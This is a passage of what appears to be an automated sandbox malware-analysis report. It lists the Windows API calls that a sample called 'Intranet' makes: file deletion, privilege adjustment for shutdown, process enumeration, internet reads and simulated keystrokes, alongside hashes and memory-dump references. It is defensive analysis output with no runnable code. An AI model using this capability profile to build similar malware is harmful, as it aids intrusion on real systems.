                                                                            • Opcode Fuzzy Hash: 1dc2f05ff0bba5cfbbaf157236084fb0e25f53667ab2286a43ab43b98db4ab7c
                                                                            • Instruction Fuzzy Hash: 3141727190021A9FDF25DF64CC69AEEBBB4FF15350F14456AE814A22E1E7349E44CF60
                                                                            APIs
                                                                              • Part of subcall function 004C0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004B2A58,?,00008000), ref: 004C02A4
                                                                              • Part of subcall function 00504FEC: GetFileAttributesW.KERNEL32(?,00503BFE), ref: 00504FED
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0050407C
                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 005040CC
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 005040DD
                                                                            • FindClose.KERNEL32(00000000), ref: 005040F4
                                                                            • FindClose.KERNEL32(00000000), ref: 005040FD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                            • String ID: \*.*
                                                                            • API String ID: 2649000838-1173974218
                                                                            • Opcode ID: 05560a70120345da0314a72f1447d4b6739468b0b7dbc1439be2d79ee92b8b5e
                                                                            • Instruction ID: 2178b7e2036fc85af432690aedc41b07a3d3626ba5e3745e53e0aec9fa40598f
                                                                            • Opcode Fuzzy Hash: 05560a70120345da0314a72f1447d4b6739468b0b7dbc1439be2d79ee92b8b5e
                                                                            • Instruction Fuzzy Hash: A23183750083859BC305EF60C8A99EFBBA8BF91304F440E1EF5D1931E1DB249A0DCB66
                                                                            APIs
                                                                              • Part of subcall function 004F9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004F93E3
                                                                              • Part of subcall function 004F9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004F9410
                                                                              • Part of subcall function 004F9399: GetLastError.KERNEL32 ref: 004F941D
                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 005057B4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                            • String ID: $@$SeShutdownPrivilege
                                                                            • API String ID: 2234035333-194228
                                                                            • Opcode ID: c69c03ca3822f8edcf004c88a5fd8c9c40a49df5a2df5211a387bb6b383413d1
                                                                            • Instruction ID: 4029f898e38ba7a0cae2f6a36487343382b1ca847ba066f018e04766f4271ce1
                                                                            • Opcode Fuzzy Hash: c69c03ca3822f8edcf004c88a5fd8c9c40a49df5a2df5211a387bb6b383413d1
                                                                            • Instruction Fuzzy Hash: 6D01F731750716EAE73C66649C9ABBF7E5CFB087C0F20042AFD13D60D2FA505C04A964
                                                                            APIs
                                                                            • GetVersionExW.KERNEL32(?), ref: 004B5D40
                                                                              • Part of subcall function 004B1821: _memmove.LIBCMT ref: 004B185B
                                                                            • GetCurrentProcess.KERNEL32(?,00530A18,00000000,00000000,?), ref: 004B5E07
                                                                            • IsWow64Process.KERNEL32(00000000), ref: 004B5E0E
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004B5E5F
                                                                            • GetSystemInfo.KERNEL32(00000000), ref: 004B5E90
                                                                            • GetSystemInfo.KERNEL32(00000000), ref: 004B5E9C
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: InfoProcessSystem$CurrentFreeLibraryVersionWow64_memmove
                                                                            • String ID:
                                                                            • API String ID: 551412401-0
                                                                            • Opcode ID: 4602e1b102829b4faa9679e7a13af680398603d9ff38a547d620b86f333e6241
                                                                            • Instruction ID: 101daa5e4654658276f6bd0394f96badc8e8dd61ef3d2e817fec45c43f8d4304
                                                                            • Opcode Fuzzy Hash: 4602e1b102829b4faa9679e7a13af680398603d9ff38a547d620b86f333e6241
                                                                            • Instruction Fuzzy Hash: FC91C131549BC4DECB32CB7884615ABFFE56F2A300B884A5FD0C693B41D628E548D76E
                                                                            APIs
                                                                              • Part of subcall function 004A29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,004A1CE4,?), ref: 004A29F3
                                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 004A1DD6
                                                                            • GetSysColor.USER32(0000000F,?,?), ref: 004A1E2A
                                                                            • SetBkColor.GDI32(?,00000000), ref: 004A1E3D
                                                                              • Part of subcall function 004A166C: DefDlgProcW.USER32(?,00000020,?), ref: 004A16B4
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ColorProc$LongWindow
                                                                            • String ID:
                                                                            • API String ID: 3744519093-0
                                                                            • Opcode ID: 3fc0a11b8e5f1765b23a016ffc7077d008b918c1fd5e71ca4ad08ceace7be38b
                                                                            • Instruction ID: e4097822819dd6567c46df839cff1db91f680fd970556215f0050d286f283ddf
                                                                            • Opcode Fuzzy Hash: 3fc0a11b8e5f1765b23a016ffc7077d008b918c1fd5e71ca4ad08ceace7be38b
                                                                            • Instruction Fuzzy Hash: B2A15B70115514FAE6286B295C99DBF299EEFA7305F15010FF402C63F2CA2CAC02D2BE
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0050C329
                                                                            • _wcscmp.LIBCMT ref: 0050C359
                                                                            • _wcscmp.LIBCMT ref: 0050C36E
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0050C37F
                                                                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0050C3AF
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File_wcscmp$CloseFirstNext
                                                                            • String ID:
                                                                            • API String ID: 2387731787-0
                                                                            • Opcode ID: 7f60b423fdf068f2bb7592d37963d20f0055128c7b3c2ea36c6302473ca42e0b
                                                                            • Instruction ID: eb788b1a05ac37e1486a4c3c9151bcde4500469f40c9d22282c200e97f13e2d6
                                                                            • Opcode Fuzzy Hash: 7f60b423fdf068f2bb7592d37963d20f0055128c7b3c2ea36c6302473ca42e0b
                                                                            • Instruction Fuzzy Hash: 9E519B356046028FD718DF69C490EAEBBE8FF4A314F108A5EF956873A1DB34AD04CB91
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?,00000001), ref: 00525A02
                                                                            • IsWindowEnabled.USER32(?,?,00000001), ref: 00525A10
                                                                            • GetForegroundWindow.USER32(?,?,00000001), ref: 00525A1D
                                                                            • IsIconic.USER32(?,?,?,00000001), ref: 00525A2B
                                                                            • IsZoomed.USER32(?,?,?,?,00000001), ref: 00525A39
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                            • String ID:
                                                                            • API String ID: 292994002-0
                                                                            • Opcode ID: 5f645c9319f04075b8c5880761c16351b77fdd2022bd1a7d4a53ee2627b294e5
                                                                            • Instruction ID: 822dc8ba76be8a1a4d008656bd3cb882fd5d0b2144a2b45b3a1413f143d4e2aa
                                                                            • Opcode Fuzzy Hash: 5f645c9319f04075b8c5880761c16351b77fdd2022bd1a7d4a53ee2627b294e5
                                                                            • Instruction Fuzzy Hash: 8B110432300A219FE7211F26AC85A2E7F98FF96761B04412AF806D7281EB74D9018AE4
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: LocalTime__swprintf
                                                                            • String ID: %.3d$WIN_XPe
                                                                            • API String ID: 2070861257-2409531811
                                                                            • Opcode ID: 225318b986bf3933145fcb1a42e321f0aef46817adf832f924a7c4b3e741f396
                                                                            • Instruction ID: a9a45674728dd1ab178c83a8eed1976f0a8fc205e5f3dac2fc749149d6643bb2
                                                                            • Opcode Fuzzy Hash: 225318b986bf3933145fcb1a42e321f0aef46817adf832f924a7c4b3e741f396
                                                                            • Instruction Fuzzy Hash: 2BD01271804148EAC7549B92EC54EFA77BCEB08306F504057F556A2040D27D97CDAB3B
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0050416D
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0050417B
                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0050419B
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00504245
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 420147892-0
                                                                            • Opcode ID: c6f7b2c28df0f298505b3672dce0a95eadf832a407aaa006081aaac409a1f7b0
                                                                            • Instruction ID: c96708cc1651a03834a223a53e2791fdd30b5d4bfe913ef2a2fdef5f826001f8
                                                                            • Opcode Fuzzy Hash: c6f7b2c28df0f298505b3672dce0a95eadf832a407aaa006081aaac409a1f7b0
                                                                            • Instruction Fuzzy Hash: 7E31A2B11083419FD300EF51D895AAFBBF8BF95354F40092EF585821E1EB759949CB62
                                                                            APIs
                                                                            • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00511ED6,00000000), ref: 00512AAD
                                                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001,?,?,?,?,?,?,?,?,00511ED6,00000000), ref: 00512AE4
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                                            • String ID:
                                                                            • API String ID: 599397726-0
                                                                            • Opcode ID: 9fc175cfb396073bcab8956a1620a97bfb98439cdf1b79b94f9f28c084049eab
                                                                            • Instruction ID: 74a20fa0d499436c26ffe1cbb3b7e13438e96f4498883b89c02b2dce9f87a4cc
                                                                            • Opcode Fuzzy Hash: 9fc175cfb396073bcab8956a1620a97bfb98439cdf1b79b94f9f28c084049eab
                                                                            • Instruction Fuzzy Hash: 3D41E375604209BFFB20DE55CC85EFBBBACFF40714F10441EF605A6181EAB1AEE19664
                                                                            APIs
                                                                              • Part of subcall function 004C0FE6: std::exception::exception.LIBCMT ref: 004C101C
                                                                              • Part of subcall function 004C0FE6: __CxxThrowException@8.LIBCMT ref: 004C1031
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004F93E3
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004F9410
                                                                            • GetLastError.KERNEL32 ref: 004F941D
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                            • String ID:
                                                                            • API String ID: 1922334811-0
                                                                            • Opcode ID: 6f37eb878add69ccafa5f8f4559e17b432c0e714b0f9e48bf419db8d89e939ba
                                                                            • Instruction ID: 64c071e519866f3430eae20946fb72f5f6e745ca74f4f3877f16d2b6fb0c5dd6
                                                                            • Opcode Fuzzy Hash: 6f37eb878add69ccafa5f8f4559e17b432c0e714b0f9e48bf419db8d89e939ba
                                                                            • Instruction Fuzzy Hash: 1911BFB1418308AFD728DF54DC85E3BB7BCEB48310B20852EE45A83291EB74AC41CB64
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00504271
                                                                            • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 005042B2
                                                                            • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 005042BD
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                                            • String ID:
                                                                            • API String ID: 33631002-0
                                                                            • Opcode ID: e4fc4c4f10a0369e5ad026f0f3bceed5de1d6f141c924dbc26bfe46a2f17d2aa
                                                                            • Instruction ID: 820aed5b5c873e56b6ae88ad4f4dbe6ab4b84980890af562f566ad04e9a57f2c
                                                                            • Opcode Fuzzy Hash: e4fc4c4f10a0369e5ad026f0f3bceed5de1d6f141c924dbc26bfe46a2f17d2aa
                                                                            • Instruction Fuzzy Hash: D9113CB5E01228BBDB108FA5AC44BAFBFBCEB45B60F104156FD04E7290C6705A059BA1
                                                                            APIs
                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00504F45
                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00504F5C
                                                                            • FreeSid.ADVAPI32(?), ref: 00504F6C
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                            • String ID:
                                                                            • API String ID: 3429775523-0
                                                                            • Opcode ID: 7676e1677a63d3c4d6add5b25b7ea5d950f6cf8033632c83a502abfdcdb964e4
                                                                            • Instruction ID: 401577ced1437656ed64a5a6a07ef2997fc91991380234f1666e45091ee0ae3e
                                                                            • Opcode Fuzzy Hash: 7676e1677a63d3c4d6add5b25b7ea5d950f6cf8033632c83a502abfdcdb964e4
                                                                            • Instruction Fuzzy Hash: E2F04F7591130DFFDF04DFE0DD99AAEBBBCEF08201F404469A501E2680D7345A089B50
                                                                            APIs
                                                                            • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00501B01
                                                                            • keybd_event.USER32(?,000BECBC,?,00000000,?,?,00000002,?,000BECBC,?,00008000), ref: 00501B14
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: InputSendkeybd_event
                                                                            • String ID:
                                                                            • API String ID: 3536248340-0
                                                                            • Opcode ID: a84e774b1e560c4ce98c0f42ea79785d4101b2a0c0026db2c5d27f75860e91af
                                                                            • Instruction ID: 90d227eb540f45dea91c4369fa0188047004a2914110c2ac6b53b18622d0fdcd
                                                                            • Opcode Fuzzy Hash: a84e774b1e560c4ce98c0f42ea79785d4101b2a0c0026db2c5d27f75860e91af
                                                                            • Instruction Fuzzy Hash: 2BF0497190020DABDB10CFA4C805BFE7BB4FF14315F00804AF95596292D3799615DF95
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00519B52,?,0053098C,?), ref: 0050A6DA
                                                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00519B52,?,0053098C,?), ref: 0050A6EC
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFormatLastMessage
                                                                            • String ID:
                                                                            • API String ID: 3479602957-0
                                                                            • Opcode ID: 6a24ca3dbbd3268d1842f8c1245006a8f89ef9e9bea6c96506996af4b9a9c5c3
                                                                            • Instruction ID: 48da96e81b454ae29acf297b7d7e5dd735b0187608af1a481d98ef6b94379e51
                                                                            • Opcode Fuzzy Hash: 6a24ca3dbbd3268d1842f8c1245006a8f89ef9e9bea6c96506996af4b9a9c5c3
                                                                            • Instruction Fuzzy Hash: 11F0823550432DBBDB21AFE4CC48FEA776CBF19761F008156B90897291D6309944CBA1
                                                                            APIs
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004F8F27), ref: 004F8DFE
                                                                            • CloseHandle.KERNEL32(?,?,004F8F27), ref: 004F8E10
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                                            • String ID:
                                                                            • API String ID: 81990902-0
                                                                            • Opcode ID: d95e3349df06e994b56eb03568a592767853bcc8ad038ae9150595b1271c2317
                                                                            • Instruction ID: 34621e0463b652c4314c8cd155439c5292666d33aa7a071cc5a7630dd9c12af9
                                                                            • Opcode Fuzzy Hash: d95e3349df06e994b56eb03568a592767853bcc8ad038ae9150595b1271c2317
                                                                            • Instruction Fuzzy Hash: E7E08635000600EFE7652B51EC18E7377ADEF01310710881EF496808B0CB215CD0DB14
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,004C8F87,?,?,?,00000001), ref: 004CA38A
                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 004CA393
                                                                            Memory Dump Source
